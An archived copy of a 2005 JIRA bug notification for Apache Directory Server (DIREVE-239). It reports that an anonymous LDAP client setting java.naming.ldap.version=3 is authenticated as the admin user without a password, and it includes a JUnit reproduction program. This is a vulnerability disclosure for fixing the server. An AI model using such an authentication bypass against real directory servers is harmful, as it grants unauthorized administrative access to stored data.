Apache Directory Project - [jira] Updated: (DIREVE-239) Anonymous user may gain access as admin user

This is Interesting: Free IT Magazines  
Home > Archive > Apache Directory Project > August 2005 > [jira] Updated: (DIREVE-239) Anonymous user may gain access as admin user





You are viewing an archived Text-only version of the thread. To view this thread in it's original format and/or if you want to reply to this thread please [click here]

Author [jira] Updated: (DIREVE-239) Anonymous user may gain access as admin user
Alex Karasulu (JIRA)

2005-08-31, 2:45 am

[ http://issues.apache.org/jira/brows...VE-239?page=all ]

Alex Karasulu updated DIREVE-239:
---------------------------------

Priority: Blocker (was: Major)

Not good a major blocker.

> Anonymous user may gain access as admin user
> --------------------------------------------
>
> Key: DIREVE-239
> URL: http://issues.apache.org/jira/browse/DIREVE-239
> Project: Directory Server
> Type: Bug
> Versions: 0.9.3
> Reporter: Endi S. Dewata
> Assignee: Alex Karasulu
> Priority: Blocker

>
> Anonymous user may gain access as admin user by specifying java.naming.ldap.version=3 in the JNDI client.
> To show the problem, add a print statement in the AuthenticationService.java at line 369:
> // perform the authentication
> LdapPrincipal authorizationId = authenticator.authenticate( ctx );
> System.out.println("Authorization ID: "+authorizationId);
> Start the server, then run the following program:
> import junit.framework.TestCase;
> import javax.naming.Context;
> import javax.naming.NamingEnumeration;
> import javax.naming.directory.*;
> import java.util.Hashtable;
> public class Test extends TestCase {
> public void testAnonymousBindWithLDAPVersion3() throws Exception {
> String suffix = "dc=apache,dc=org";
> Hashtable env = new Hashtable();
> env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
> env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
> // env.put("java.naming.ldap.version", "3");
> DirContext ctx = new InitialDirContext(env);
> SearchControls sc = new SearchControls();
> sc.setSearchScope(SearchControls.SUBTREE_SCOPE);
> NamingEnumeration ne = ctx.search(suffix, "(objectClass=*)", sc);
> System.out.println("Search results:");
> int counter = 0;
> while (ne.hasMore()) {
> SearchResult sr = (SearchResult)ne.next();
> String rdn = sr.getName();
> System.out.println(" - "+("".equals(rdn) ? suffix : rdn+","+suffix));
> counter++;
> }
> System.out.println("Found "+counter+" entries.");
> ctx.close();
> }
> }
> Without specifying java.naming.ldap.version=3, the user will remain anonymous (empty Authentication ID). However, with java.naming.ldap.version=3, the anonymous user gets authenticated as the admin user without even specifying any password.

--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
http://issues.apache.org/jira/secur...nistrators.jspa
-
For more information on JIRA, see:
http://www.atlassian.com/software/jira


Sponsored Links






Free braindumps | Software forum | Database administration forum

Copyright 2003 - 2008 webservertalk.com